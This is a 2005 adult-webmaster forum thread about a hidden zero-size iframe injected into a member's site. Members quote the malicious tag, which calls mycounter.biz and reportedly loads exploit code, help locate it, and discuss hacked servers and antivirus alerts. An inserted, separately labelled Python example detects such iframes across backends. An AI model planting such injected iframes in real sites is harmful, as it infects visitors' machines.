GoFuckYourself.com - Adult Webmaster Forum


SleazyDream 04-06-2005 12:14 AM

Joker says I have an install on my site - HELP
 
on icq now with joker, this is pissing me off cause I can't find it.

here's what he said to me. (note - to my knowledge i have no installs)

"anyway... you can install what you want, it gets back to you earlier or later when it changes your affiliate-codes and does funny shit with the ppl that visit your site. I don't care, cause you hurt yourself, besides the whole industry of course... except a few, that can keep their users machines clean (networks that actually care and send legit campaigns)... If you would admit you did, I had no problem with it... I know the code was there, I know it's not just for me since my machine is clean, yet it had to be a "miracle" if I believe you."


to my knowledge there are NO installs on my site - but it has been hacked before. I'm looking over all my servers with the techs now and can't find this code he's accusing me of putting on the site

this is what he says is there <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>


does anyone else see this - we can't seem to find it?

i'm thinking he's got a virus that's adding this to sites like mine on his machine from somewhere else but i'm open to anyone's help here if they see it on my site cause if it's there I want it off - BAD.


scott

ProjectNaked 04-06-2005 12:16 AM

sucks...I've been getting all kind of attempts from worms and lots of nasty email attachments - :mad:

bringer 04-06-2005 12:17 AM

where specifically is he seeing it? i did a quick check and found nothing remotely close to that

JOKER 04-06-2005 12:18 AM

A bit out of context - but ok, I'll play...


Look for this sourcecode at the near bottom of the site:

Code:

<!-- BEGIN SEXTRACKER CLIT CODE v2.1_f - ALTERATION WILL RESULT IN INACCURATE STATS --> <!-- THE FOLLOWING CODE IS COPYRIGHT (C) 1997-99 FLYING CROCODILE, INC --> <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>

Mr.Fiction 04-06-2005 12:19 AM

Maybe he has spyware on his computer.

bringer 04-06-2005 12:20 AM

Quote:

Originally Posted by JOKEREMPIRE
A bit out of context - but ok, I'll play...


Look for this sourcecode at the near bottom of the site:

Code:

<!-- BEGIN SEXTRACKER CLIT CODE v2.1_f - ALTERATION WILL RESULT IN INACCURATE STATS --> <!-- THE FOLLOWING CODE IS COPYRIGHT (C) 1997-99 FLYING CROCODILE, INC --> <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>

Code:

<!-- BEGIN SEXTRACKER CLIT CODE v2.1_f - ALTERATION WILL RESULT IN INACCURATE STATS --> <!-- THE FOLLOWING CODE IS COPYRIGHT (C) 1997-99 FLYING CROCODILE, INC --> <script
language="JavaScript"><!--
jv=10;an=navigator.appName;av=Math.round(parseFloat(navigator.appVersion)*1000);if(
navigator.appName.substring(0,9)=="Microsoft"){an="MSIE";}if((an=="MSIE")&&(parseInt
(navigator.appVersion)==2)){av=3010;}
//--></script> <script language="JavaScript1.1"><!--
jv=11;
//--></script> <script
language="JavaScript1.2"><!--
jv=12;window.onerror=function(){return true;}
//--></script> <script language="JavaScript1.3"><!--
jv=13;
//--></script> <script
language="JavaScript1.4"><!--
jv=14;
//--></script> <script language="JavaScript"><!--
j=0;tmp="";ss="na";cd="na";je="na";dt=new Date();tz=dt.getHours();hr=""+escape(
parent.document.referrer);function isNotDefined(v){return((v=="undefined")?true:false);}
if((isNotDefined(hr)==true)||(hr=="")||(hr=="bookmarks")){hr="Bookmark";}else{wl=
window.location.href;if(wl.lastIndexOf('/')!=(wl.length-1)){wl=wl+"/";}tdr=
parent.document.referrer;if(tdr.lastIndexOf('/')!=(tdr.length-1)){tdr=tdr+"/";}if(tdr==wl)
{hr="na";}}if(jv>=11){je=(navigator.javaEnabled()==true)?"tr":"fa";}if(jv>=12){ss=
screen.width+"x"+screen.height;cd=(an=="MSIE")?screen.colorDepth:screen.pixelDepth;
if(isNotDefined(cd)==true){cd="na";}}u="jv="+jv+"&an="+an+"&av="+av+"&ss="+ss+"&cd="+cd+
"&r="+hr+"&je="+je+"&ud=623"+"&tz="+tz;if(document.bgColor!=null){itag=
"<font color=\""+document.bgColor+"\">";}else{itag="";}itag=itag+
"<img height=\"1\" width=\"1\" border=\"0\" alt=\"\" src=\"http://clit4."+
"sextracker.com/clit?CID=179715&"+u+"\">";if(document.bgColor!=null){itag=itag+"</font>";}
document.write(itag+"\n");
//--></script> <noscript><img height="1"
width="1" border="0" alt
src="http://clit4.sextracker.com/clit?CID=179715&jv=00&ud=623"> </noscript> <!-- DONE WITH SEXTRACKER CLIT CODE -- HAVE A NICE DAY --> </p>

</body>
</html>


Fake Nick 04-06-2005 12:21 AM

what is your site again ?

JOKER 04-06-2005 12:23 AM

The site runs with a round-robin DNS on 3 servers, so it's possible
you see the code only on one of them for certain countries and just on a first-visit (it disappeared for me after telling Sleazy and doing a reload of the page)

What the iframe does is it shows the encoded Javascript from

http://iframeprofit.com/adverts/bruce/index.php
(don't click if your PC is not 100% secure - EXPLOIT)

which is obviously the code of affiliate "bruce" of http://iframeprofit.com
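Added example, not part of any post in this thread: a check for the situation described above, where a zero-size iframe to a third-party host is served by only one of several round-robin backends. The backend addresses, `site.example`, and the sample pages are constructed; in practice each page would be fetched per backend IP with the site's Host header, on a fresh first visit.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class HiddenIframeFinder(HTMLParser):
    """Collect iframes that render invisibly and load from a foreign host."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        raw = {k: (v or "") for k, v in attrs}
        norm = {k: v.strip().lower() for k, v in raw.items()}
        style = norm.get("style", "").replace(" ", "")
        zero = ("0", "0px", "0%")
        hidden = (norm.get("width") in zero or norm.get("height") in zero
                  or "display:none" in style or "visibility:hidden" in style)
        host = urlparse(raw.get("src", "")).hostname or ""
        external = bool(host) and host != self.site_host \
            and not host.endswith("." + self.site_host)
        if hidden and external:
            self.findings.append(raw["src"])

def audit_backends(pages, site_host):
    """pages maps backend IP -> HTML served by that backend."""
    report = {}
    for ip, html in pages.items():
        finder = HiddenIframeFinder(site_host)
        finder.feed(html)
        report[ip] = finder.findings
    return report

def flagged_backends(report):
    """Backends that served at least one hidden external iframe."""
    return sorted(ip for ip, found in report.items() if found)

# Constructed sample responses; the injected tag is the one quoted in the thread.
CLEAN = ('<html><body><p>gallery</p>'
         '<iframe src="http://ads.example.net/box" width="300" height="250"></iframe>'
         '<iframe src="/local/ping" width="0" height="0"></iframe></body></html>')
INJECTED = CLEAN.replace(
    "</body>",
    '<!-- counter code --> <iframe src="http://mycounter.biz/in.php?wm=bruce" '
    'width="0" height="0"></iframe></body>')
SAMPLE_PAGES = {"192.0.2.10": CLEAN, "192.0.2.11": INJECTED, "192.0.2.12": CLEAN}

if __name__ == "__main__":
    for ip, found in audit_backends(SAMPLE_PAGES, "site.example").items():
        print(ip, "SUSPECT" if found else "clean", found)
```
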

jigga 04-06-2005 12:26 AM

Quote:

Originally Posted by SleazyDream
on icq now with joker, this is pissing me off cause I can't find it.

here's what he said to me. (note - to my knowledge i have no installs)

"anyway... you can install what you want, it gets back to you earlier or later when it changes your affiliate-codes and does funny shit with the ppl that visit your site. I don't care, cause you hurt yourself, besides the whole industry of course... except a few, that can keep their users machines clean (networks that actually care and send legit campaigns)... If you would admit you did, I had no problem with it... I know the code was there, I know it's not just for me since my machine is clean, yet it had to be a "miracle" if I believe you."


to my knowledge there are NO installs on my site - but it has been hacked before. I'm looking over all my servers with the techs now and can't find this code he's accusing me of putting on the site

this is what he says is there <iframe src="http://mycounter.biz/in.php?wm=bruce" width="0" height="0"></iframe>


does anyone else see this - we can't seem to find it?

i'm thinking he's got a virus that's adding this to sites like mine on his machine from somewhere else but i'm open to anyone's help here if they see it on my site cause if it's there I want it off - BAD.


scott


Many times I find (thanks to surfer emails) that stuff appears on galleries/sites that only shows up on specific country ip's. Personally I don't trust counters much and that may be what's causing it.

fünkmaster 04-06-2005 12:28 AM

Quote:

Originally Posted by Fake Nick
what is your site again ?

... I more and more enjoy your comments !!
:1orglaugh :1orglaugh :1orglaugh :1orglaugh

SleazyDream 04-06-2005 12:28 AM

we found it and removed it.

same fuckers as before. uggggg

fucking thieves

bringer 04-06-2005 12:29 AM

Quote:

Originally Posted by jigga
Many times I find (thanks to surfer emails) that stuff appears on galleries/sites that only shows up on specific country ip's. Personally I don't trust counters much and that may be what's causing it.

yep, ive had the same problem with counters and foreign traffic

JOKER 04-06-2005 12:29 AM

Quote:

Originally Posted by Mr.Fiction
Maybe he has spyware on his computer.


No Spyware here, 110% sure :winkwink:

bringer 04-06-2005 12:29 AM

Quote:

Originally Posted by SleazyDream
we found it and removed it.

same fuckers as before. uggggg

fucking thieves

server hacked or what?

jigga 04-06-2005 12:30 AM

Quote:

Originally Posted by jigga
Many times I find (thanks to surfer emails) that stuff appears on galleries/sites that only shows up on specific country ip's. Personally I don't trust counters much and that may be what's causing it.

and by counters I don't mean the companies that run the counter (although that's debatable too after porngrah and rumours about others :winkwink: ) but the fact that the same code appears on thousands of pages and thus makes it easy to exploit for hackers to call up whatever they want when a surfer hits that specific code.

Webmaster_Logic 04-06-2005 12:35 AM

Quote:

Originally Posted by bringer
server hacked or what?

Had to be.

boneprone 04-06-2005 12:41 AM

My sites were hacked yesterday....

boneprone 04-06-2005 12:42 AM

Actually my programmer's security was breached and his usernames and login passwords to my servers were left exposed for the hackers to take and get into my server at will..

Still having Jupiter Hosting run a full diagnostic on what all was installed other than a change in my index pages. But for now my host techs have found info on the guy and have blocked em out..

According to my programmer some back doors were installed.

So Sleazy, always watch those backdoors..

frankfortuna 04-06-2005 12:45 AM

Since we're on the topic, I've been getting this from the al4a/worldsex ad server for months upon every 10-40 clicks to their banners. Pierre says everything is clean. Anyone else getting this or is it a Norton bug perhaps?

Scan type: Auto-Protect Scan
Event: Threat Found!
Threat: Bloodhound.Exploit.20
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB\bla[1].ani
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB
Computer: HOME
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, April 06, 2005 3:39:42 AM

KRL 04-06-2005 12:50 AM

There are some hardcore asian hackers making the rounds on servers.

TheJimmy 04-06-2005 12:50 AM

it's ok to be dirty....just use cologne...


PS: that polymorphic shit is bad bad bad news...


.

JOKER 04-06-2005 12:51 AM

Quote:

Originally Posted by frankfortuna
Since we're on the topic, I've been getting this from the al4a/worldsex ad server for months upon every 10-40 clicks to their banners. Pierre says everything is clean. Anyone else getting this or is it a Norton bug perhaps?

Scan type: Auto-Protect Scan
Event: Threat Found!
Threat: Bloodhound.Exploit.20
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB\bla[1].ani
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB
Computer: HOME
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, April 06, 2005 3:39:42 AM

Do you honestly surf the net and work logged in as Administrator?

Full rights and all??

DateDoc 04-06-2005 12:59 AM

I have to admit at first glance of this post I thought Sleazy was saying "Choker says....." So I went back to the beginning to reread as I couldn't for the life of me figure out why Choker would help Sleazy out and found out it was "Joker says......"

Ackk, it is too late and too many beverages to be going through GFY. Night, night! :1orglaugh :1orglaugh

pornstar2pac 04-06-2005 01:00 AM

is there anyway you can stop these hackers?

maybe $100,000 will make them go away

SleazyDream 04-06-2005 01:18 AM

Quote:

Originally Posted by BusterPorn
I have to admit at first glance of this post I thought Sleazy was saying "Choker says....." So I went back to the beginning to reread as I couldn't for the life of me figure out why Choker would help Sleazy out and found out it was "Joker says......"

Ackk, it is too late and too many beverages to be going through GFY. Night, night! :1orglaugh :1orglaugh

jesus christ - i get blamed for every fucking thing with choker with you people - no wonder he's insane.

fünkmaster 04-06-2005 01:30 AM

Quote:

Originally Posted by frankfortuna
Since we're on the topic, I've been getting this from the al4a/worldsex ad server for months upon every 10-40 clicks to their banners. Pierre says everything is clean. Anyone else getting this or is it a Norton bug perhaps?

Scan type: Auto-Protect Scan
Event: Threat Found!
Threat: Bloodhound.Exploit.20
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB\bla[1].ani
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6FGZALOB
Computer: HOME
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Wednesday, April 06, 2005 3:39:42 AM

... same here, but i kept quiet, now the cat is out of the bag.

fünkmaster 04-06-2005 01:32 AM

Quote:

Originally Posted by JOKEREMPIRE
Do you honestly surf the net and work logged in as Administrator?

Full rights and all??

... default NT login shell, gotta love that OS !!
:1orglaugh :1orglaugh


All times are GMT -7.